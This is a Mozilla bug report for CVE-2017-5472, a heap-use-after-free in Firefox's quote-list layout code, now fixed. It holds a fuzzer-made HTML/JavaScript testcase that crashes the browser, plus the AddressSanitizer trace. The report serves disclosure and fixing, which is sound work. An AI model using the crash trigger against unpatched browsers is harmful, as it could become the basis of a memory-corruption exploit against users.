1365602 - (CVE-2017-5472) heap-use-after-free in nsQuoteList::RecalcAll

Status: VERIFIED FIXED

(Core :: Layout, defect)

Description

[Nils]

Attachment: crash.html (testcase, crashes firefox)

The following testcase crashes the latest ASAN build of Firefox ESR 52.1.0 (BuildID=20170417135202).

<script>
function start() {
	o1=window.document;
	o186=document.createElementNS('http://www.w3.org/1999/xhtml','script');
	o221=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	document.documentElement.appendChild(o221);
	o224=document.createElementNS('http://www.w3.org/1999/xhtml','audio');
	o264=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	document.documentElement.appendChild(o264);
	o326=document.createElementNS('http://www.w3.org/1999/xhtml','td');
        window.top.document.documentElement.appendChild(o224);
        o186.prepend(undefined,undefined);
        o326.appendChild(o186);
        o531=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	document.body.onerror=fun0;
	o224.after(undefined,o531,o326);
}
function fun0() {
	o625=o531.contentWindow;
	o683=document.createElementNS('http://www.w3.org/1999/xhtml','h6');
	window.top.document.documentElement.appendChild(o264);
	o683.innerHTML="<q cellpadding>";
	document.documentElement.addEventListener('DOMAttrModified',fun1);
	document.documentElement.setAttribute('step','0');
}
var c=0;
function fun1() {
	if(c++!=0)fun2();
	else {
		document.documentElement.style.position='relative';
		o1040=document.createElementNS('http://www.w3.org/1999/xhtml','iframe'); // hopefully
		document.documentElement.appendChild(o1040);
		o1099=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
		document.documentElement.appendChild(o1099);
		o1115=o1099.contentWindow;
	        o1305=o625.document;
	        o1319=window.top.frames[1];
	        o1357=o1319.document;
	        o1358=o1040.contentWindow;
	        o1359=o1358.document;
	        o1360=o1359.documentElement;
	        o1363=o1115.document;
	        o1364=o1363.documentElement;
		o1403=o1305.documentElement;
	        o1412=function() {let x=o1357.querySelectorAll('*:not([id])');return x[x.length-1]}();
	        o1449=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	        o1449.src="data:text/html,x";
	        o1403.appendChild(o1449);
	       	o1364.appendChild(o921);
        	window.top.document.documentElement.appendChild(o1360);
	        o1360.innerHTML="<q id==><hgroup>";;
		window.top.document.documentElement.appendChild(o683);
		o1412.onpagehide=fun3;
	}
}
function fun2() {
	o850=(new DOMParser()).parseFromString('<dl contenteditable>','text/html');
	o921=o850.all[2];
	o1.designMode='on';
}
function fun3() {
	o2034=document.createElementNS('http://www.w3.org/1999/xhtml','style');
	o2034.style.display='ruby-text';
	window.top.document.documentElement.appendChild(o2034);
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==12107==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600029a568 at pc 0x7ff785f8a2d8 bp 0x7ffc107c2de0 sp 0x7ffc107c2dd8
READ of size 8 at 0x60600029a568 thread T0
    #0 0x7ff785f8a2d7 in getNext /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/LinkedList.h:206:41
    #1 0x7ff785f8a2d7 in Next /home/worker/workspace/build/src/layout/base/nsGenConList.h:94
    #2 0x7ff785f8a2d7 in Next /home/worker/workspace/build/src/layout/base/nsQuoteList.h:80
    #3 0x7ff785f8a2d7 in nsQuoteList::RecalcAll() /home/worker/workspace/build/src/layout/base/nsQuoteList.cpp:77
    #4 0x7ff785d972ae in nsCSSFrameConstructor::RecalcQuotesAndCounters() /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:8723:5
    #5 0x7ff785f4fb08 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4192:7
    #6 0x7ff781f4f2f0 in nsDocument::FlushPendingNotifications(mozFlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7774:7
    #7 0x7ff781f4f110 in nsDocument::FlushPendingNotifications(mozFlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7752:5
    #8 0x7ff781f4f110 in nsDocument::FlushPendingNotifications(mozFlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7752:5
    #9 0x7ff780f97da3 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:683:9
    #10 0x7ff780f9a304 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
    #11 0x7ff780f9aebc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
    #12 0x7ff77f54b2ca in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
    #13 0x7ff77f54766f in mozilla::net::nsLoadGroup::Cancel(nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:270:15
    #14 0x7ff780f9782f in nsDocLoader::Stop() /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:243:10
    #15 0x7ff780f976a8 in nsDocLoader::Stop() /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:240:3
    #16 0x7ff786bbf041 in Stop /home/worker/workspace/build/src/docshell/base/nsDocShell.h:189:12
    #17 0x7ff786bbf041 in nsDocShell::Stop(unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5547
    #18 0x7ff786be4bed in nsDocShell::InternalLoad(nsIURI*, nsIURI*, bool, nsIURI*, unsigned int, nsIPrincipal*, nsIPrincipal*, unsigned int, nsAString_internal const&, char const*, nsAString_internal const&, nsIInputStream*, nsIInputStream*, unsigned int, nsISHEntry*, bool, nsAString_internal const&, nsIDocShell*, nsIURI*, nsIDocShell**, nsIRequest**) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:10631:12
    #19 0x7ff786bdc794 in nsDocShell::LoadURI(nsIURI*, nsIDocShellLoadInfo*, unsigned int, bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:1560:10
    #20 0x7ff781fb86dc in nsFrameLoader::ReallyStartLoadingInternal() /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:596:8
    #21 0x7ff781f297f9 in ReallyStartLoading /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:480:17
    #22 0x7ff781f297f9 in nsDocument::MaybeInitializeFinalizeFrameLoaders() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:6913
    #23 0x7ff781f290d7 in nsDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:4797:3
    #24 0x7ff78416390c in nsHTMLDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2424:3
    #25 0x7ff782025574 in ~mozAutoDocUpdate /home/worker/workspace/build/src/dom/base/mozAutoDocUpdate.h:40:7
    #26 0x7ff782025574 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2521
    #27 0x7ff782021293 in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1850:12
    #28 0x7ff782021293 in nsINode::After(mozilla::dom::Sequence<mozilla::dom::OwningNodeOrString> const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1809
    #29 0x7ff783483b8b in mozilla::dom::ElementBinding::after(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:3483:3
    #30 0x7ff7839b8af0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2879:13
    #31 0x7ff789be2f55 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #32 0x7ff789be2f55 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #33 0x7ff789bc335f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #34 0x7ff789bc335f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #35 0x7ff789ba851d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #36 0x7ff789be35bf in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #37 0x7ff789be3c02 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #38 0x7ff7896b60ad in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #39 0x7ff7833be7ff in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #40 0x7ff783db498a in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #41 0x7ff783db498a in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #42 0x7ff783d8099d in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134:16
    #43 0x7ff783d823c7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
    #44 0x7ff783d6d4f6 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
    #45 0x7ff783d70b88 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #46 0x7ff785ea6a8c in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1023:7
    #47 0x7ff786c3499b in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7630:5
    #48 0x7ff786c307a4 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7434:7
    #49 0x7ff786c37e0f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7331:13
    #50 0x7ff780f9c510 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
    #51 0x7ff780f9b4a8 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
    #52 0x7ff780f98208 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
    #53 0x7ff780f9a304 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
    #54 0x7ff780f9aebc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
    #55 0x7ff77f54b2ca in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
    #56 0x7ff781f56a86 in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8640:7
    #57 0x7ff781f56456 in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8568:9
    #58 0x7ff781f2c904 in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5055:3
    #59 0x7ff781feaf72 in applyImpl<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:775:12
    #60 0x7ff781feaf72 in apply<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:781
    #61 0x7ff781feaf72 in mozilla::detail::RunnableMethodImpl<void (nsDocument::*)(), true, false>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:810
    #62 0x7ff77f3773bb in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
    #63 0x7ff77f3f678c in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #64 0x7ff78017212f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #65 0x7ff7800e47a8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #66 0x7ff7800e47a8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #67 0x7ff7800e47a8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #68 0x7ff7855b653f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #69 0x7ff7875a9f21 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #70 0x7ff7877325ce in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4488:10
    #71 0x7ff787733add in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4621:8
    #72 0x7ff78773499c in XRE_main /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4712:16
    #73 0x4df8ca in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:282:10
    #74 0x4df8ca in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:415
    #75 0x7ff79a38a82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #76 0x41ba38 in _start (/home/nils/fuzzer3/esr/firefox/firefox+0x41ba38)

0x60600029a568 is located 8 bytes inside of 64-byte region [0x60600029a560,0x60600029a5a0)
freed by thread T0 here:
    #0 0x4b218b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7ff785e2136f in Destroy /home/worker/workspace/build/src/layout/base/nsGenConList.h:124:5
    #2 0x7ff785e2136f in nsGenConList::DestroyNodesFor(nsIFrame*) /home/worker/workspace/build/src/layout/base/nsGenConList.cpp:40
    #3 0x7ff785d5317c in nsCSSFrameConstructor::NotifyDestroyingFrame(nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:1612:9
    #4 0x7ff785f3e4ab in PresShell::NotifyDestroyingFrame(nsIFrame*) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:2052:5
    #5 0x7ff78607413c in nsFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:726:3
    #6 0x7ff786021408 in DestroyFramesFrom /home/worker/workspace/build/src/layout/generic/nsFrameList.cpp:57:5
    #7 0x7ff786021408 in nsContainerFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:221
    #8 0x7ff7861c5508 in nsLineBox::DeleteLineList(nsPresContext*, nsLineList&, nsIFrame*, nsFrameList*) /home/worker/workspace/build/src/layout/generic/nsLineBox.cpp:389:7
    #9 0x7ff786020864 in nsBlockFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:326:3
    #10 0x7ff7861c5508 in nsLineBox::DeleteLineList(nsPresContext*, nsLineList&, nsIFrame*, nsFrameList*) /home/worker/workspace/build/src/layout/generic/nsLineBox.cpp:389:7
    #11 0x7ff786020864 in nsBlockFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:326:3
    #12 0x7ff7861c5508 in nsLineBox::DeleteLineList(nsPresContext*, nsLineList&, nsIFrame*, nsFrameList*) /home/worker/workspace/build/src/layout/generic/nsLineBox.cpp:389:7
    #13 0x7ff786020864 in nsBlockFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:326:3
    #14 0x7ff786021408 in DestroyFramesFrom /home/worker/workspace/build/src/layout/generic/nsFrameList.cpp:57:5
    #15 0x7ff786021408 in nsContainerFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:221
    #16 0x7ff786081ef5 in nsCanvasFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:153:3
    #17 0x7ff786021408 in DestroyFramesFrom /home/worker/workspace/build/src/layout/generic/nsFrameList.cpp:57:5
    #18 0x7ff786021408 in nsContainerFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:221
    #19 0x7ff7860952aa in Destroy /home/worker/workspace/build/src/layout/generic/nsIFrame.h:576:20
    #20 0x7ff7860952aa in nsContainerFrame::RemoveFrame(mozilla::layout::FrameChildListID, nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:170
    #21 0x7ff785ec4596 in nsFrameManager::RemoveFrame(mozilla::layout::FrameChildListID, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsFrameManager.cpp:506:5
    #22 0x7ff785d9407b in nsCSSFrameConstructor::ContentRemoved(nsIContent*, nsIContent*, nsIContent*, nsCSSFrameConstructor::RemoveFlags, bool*, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:8498:5
    #23 0x7ff785d091ce in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, bool, nsCSSFrameConstructor::RemoveFlags, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:9683:10
    #24 0x7ff785d91c35 in nsCSSFrameConstructor::WipeContainingBlock(nsFrameConstructorState&, nsIFrame*, nsIFrame*, nsCSSFrameConstructor::FrameConstructionItemList&, bool, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:12458:7
    #25 0x7ff785d8e056 in nsCSSFrameConstructor::ContentAppended(nsIContent*, nsIContent*, bool) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7491:7
    #26 0x7ff785f521c8 in PresShell::ContentAppended(nsIDocument*, nsIContent*, nsIContent*, int) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4393:3
    #27 0x7ff782076abc in nsNodeUtils::ContentAppended(nsIContent*, nsIContent*, int) /home/worker/workspace/build/src/dom/base/nsNodeUtils.cpp:167:3
    #28 0x7ff78201ed72 in nsINode::doInsertChildAt(nsIContent*, unsigned int, bool, nsAttrAndChildArray&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1628:7
    #29 0x7ff7820254d6 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2514:14
    #30 0x7ff7826cfaf5 in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1850:12
    #31 0x7ff7826cfaf5 in AppendChild /home/worker/workspace/build/src/dom/base/nsINode.h:1854
    #32 0x7ff7826cfaf5 in mozilla::dom::NodeBinding::appendChild(JSContext*, JS::Handle<JSObject*>, nsINode*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/NodeBinding.cpp:696
    #33 0x7ff7839b8af0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2879:13
    #34 0x7ff789be2f55 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #35 0x7ff789be2f55 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #36 0x7ff789bc335f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #37 0x7ff789bc335f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #38 0x7ff789ba851d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12

previously allocated by thread T0 here:
    #0 0x4b24ab in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0d9d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7ff785d53fc0 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7ff785d53fc0 in nsCSSFrameConstructor::CreateGeneratedContent(nsFrameConstructorState&, nsIContent*, nsStyleContext*, unsigned int) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:1761
    #4 0x7ff785d5630d in nsCSSFrameConstructor::CreateGeneratedContentItem(nsFrameConstructorState&, nsContainerFrame*, nsIContent*, nsStyleContext*, mozilla::CSSPseudoElementType, nsCSSFrameConstructor::FrameConstructionItemList&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:1906:7
    #5 0x7ff785d81c8c in nsCSSFrameConstructor::BuildInlineChildItems(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItem&, bool, bool) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:12152:5
    #6 0x7ff785d596e2 in nsCSSFrameConstructor::AddFrameConstructionItemsInternal(nsFrameConstructorState&, nsIContent*, nsContainerFrame*, nsIAtom*, int, bool, nsStyleContext*, unsigned int, nsTArray<nsIAnonymousContentCreator::ContentInfo>*, nsCSSFrameConstructor::FrameConstructionItemList&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5993:5
    #7 0x7ff785d7aa1a in DoAddFrameConstructionItems /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5636:3
    #8 0x7ff785d7aa1a in nsCSSFrameConstructor::AddFrameConstructionItems(nsFrameConstructorState&, nsIContent*, bool, nsCSSFrameConstructor::InsertionPoint const&, nsCSSFrameConstructor::FrameConstructionItemList&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5658
    #9 0x7ff785d5f4f3 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10823:9
    #10 0x7ff785d69efd in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&, nsIFrame*, PendingBinding*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11851:3
    #11 0x7ff785d72bf2 in nsCSSFrameConstructor::ConstructNonScrollableBlockWithConstructor(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItem&, nsContainerFrame*, nsStyleDisplay const*, nsFrameItems&, nsBlockFrame* (*)(nsIPresShell*, nsStyleContext*)) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4948:3
    #12 0x7ff785d7bea7 in nsCSSFrameConstructor::ConstructNonScrollableBlock(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItem&, nsContainerFrame*, nsStyleDisplay const*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4912:10
    #13 0x7ff785d75c32 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:3845:7
    #14 0x7ff785d82ea6 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6187:3
    #15 0x7ff785d8b2d4 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10629:5
    #16 0x7ff785d8b2d4 in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, bool) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:8057
    #17 0x7ff785d0947b in ContentInserted /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7630:10
    #18 0x7ff785d0947b in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, bool, nsCSSFrameConstructor::RemoveFlags, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:9697
    #19 0x7ff785d27586 in mozilla::RestyleManagerBase::ProcessRestyledFrames(nsStyleChangeList&) /home/worker/workspace/build/src/layout/base/RestyleManagerBase.cpp:1176:7
    #20 0x7ff785d2e499 in ProcessOneRestyle /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:105:5
    #21 0x7ff785d2e499 in mozilla::RestyleTracker::DoProcessRestyles() /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:266
    #22 0x7ff785d10364 in ProcessRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManager.h:490:7
    #23 0x7ff785d10364 in mozilla::RestyleManager::ProcessPendingRestyles() /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:834
    #24 0x7ff785f4f92e in ProcessPendingRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerHandleInlines.h:74:3
    #25 0x7ff785f4f92e in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4159
    #26 0x7ff781f4f2f0 in nsDocument::FlushPendingNotifications(mozFlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7774:7
    #27 0x7ff781f4f110 in nsDocument::FlushPendingNotifications(mozFlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7752:5
    #28 0x7ff781f4f110 in nsDocument::FlushPendingNotifications(mozFlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7752:5
    #29 0x7ff780f97da3 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:683:9
    #30 0x7ff780f9a304 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
    #31 0x7ff780f9aebc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
    #32 0x7ff77f54b2ca in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
    #33 0x7ff77f54766f in mozilla::net::nsLoadGroup::Cancel(nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:270:15
    #34 0x7ff780f9782f in nsDocLoader::Stop() /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:243:10
    #35 0x7ff780f976a8 in nsDocLoader::Stop() /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:240:3
    #36 0x7ff786bbf041 in Stop /home/worker/workspace/build/src/docshell/base/nsDocShell.h:189:12
    #37 0x7ff786bbf041 in nsDocShell::Stop(unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5547

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/LinkedList.h:206:41 in getNext
Shadow bytes around the buggy address:
  0x0c0c8004b450: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c8004b460: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c0c8004b470: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
